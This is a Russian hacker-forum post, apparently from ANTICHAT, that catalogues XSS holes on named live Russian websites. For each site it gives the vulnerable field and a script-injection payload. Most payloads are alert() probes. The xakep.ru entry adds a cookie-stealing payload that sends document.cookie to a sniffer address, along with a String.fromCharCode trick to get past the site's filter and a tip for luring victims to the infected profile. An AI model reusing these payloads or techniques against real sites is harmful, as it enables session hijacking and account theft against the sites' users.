ANTICHAT — форум по информационной безопасности, OSINT и технологиям

www.web-hack.ru --> добавить новость

Вбиваем все данные на фонарь кроме кода, его вводим правильно. В саму новость(textarea) пишем:
и жмем кнопочку добавить (Аdd)

ps Как выяснилось, она является активной.

www.wikiupload.com
Заливаем любой файл...в описание пишем
Кнопочку "upload" жмем...
Выдается 2 ссылки, одна на скачку, другая на комментарии файла..
Идем в каменты и видим хсс
Пример

chatcity.ru

Ну вообщем то........вроде чаты на chatcity


Поля:
E-mail
web-страничка

Вот один пример на volchat.ru

narod.yandex.ru

Пишем письмо в сообщество, уязвимо поле "Ваш сайт:"

<script>alert('123');</script>

nm.ru

прикрепляем к письму файл txt или pdf со скриптом.

www.xyligan.ru

уязвимо поле "имя"))))

зы это из компании Хакера
ззы пассивных там полно.

www.xakep.ru

хсс в чате

уязвимо любое поле, но только одно, там нет ограничения на кол-во символов, но стоит фильтрация символов:
" ? +
это можно спокойно обойти через String.fromCharCode()
сам код идет в виде

"onmouseover="navigate('адрес_снифера' .concat(document.cookie))"
или просто
"onmouseover="alert('xss')"

кодируем
navigate('адрес_снифера'.concat(docume nt.cookie))
с помощью http://ha.ckers.org/xss.html
получится примерно

и пишем в виде

"onmouseover="String.fromCharCode(то что закодировали)"

ну чтоб все заработало там ставится галка "Допустить других к просмотру профайла" и говорим посмотрите мой профиль вот так)

зы спс DimOnOID за небольшую помощь)

www.panvasoft.com
Весьма популярный,посещаемый сайт.
потставляем "><script>alert()</script> во все поля в коментариях.

Пример:http://panvasoft.com/rus/11970/gb/


www.hpclub.ru
Добавление комментарий
"><script>alert()</script>

Пример:http://www.hpclub.ru/news.php3?cID=4

www.consultclub.biz

Добавление комментарий
"><script>alert()</script>[/B]

www.lektravi.ru
Интернет магазин Лекарственные травы
Травки не желаете....=)
Активка в гостевой, при добавлении сообщения в поле почта пишем
пример